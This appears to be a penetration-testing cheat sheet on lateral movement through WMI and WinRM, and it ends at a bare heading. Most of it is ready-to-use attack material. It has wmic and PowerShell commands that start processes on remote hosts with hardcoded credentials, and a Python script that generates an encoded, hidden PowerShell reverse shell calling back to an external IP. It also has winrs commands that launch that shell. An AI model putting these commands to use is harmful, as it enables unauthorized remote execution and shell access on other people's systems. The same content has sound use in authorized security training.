WMI & WinRM

WMI

In order to create a process on a remote machine via WMI, we need credentials of a member of the Administrators local group on the remote machine. (which can also be a domain user).

wmic (deprecated)

This will open the calculator app on the remote machine:

wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"

Via Powershell

Run any command. Enter this in a cli line by line:

$username = '<USER>';
$password = '<PASS>!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName <IP> -Credential $credential -SessionOption $Options 
$command = '<COMMAND>';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

If we want a reverse shell, we can set $command to the output of this python script. Make sure to replace IP and port.

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -enc " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

We will catch the shell on our netcat listener.

WinRM

winrs

winrs -r:files04 -u:jen -p:Nexus123!  "<COMMAND>"

For a rev shell

winrs -r:files04 -u:jen -p:Nexus123!  "powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdA..."

Via powershell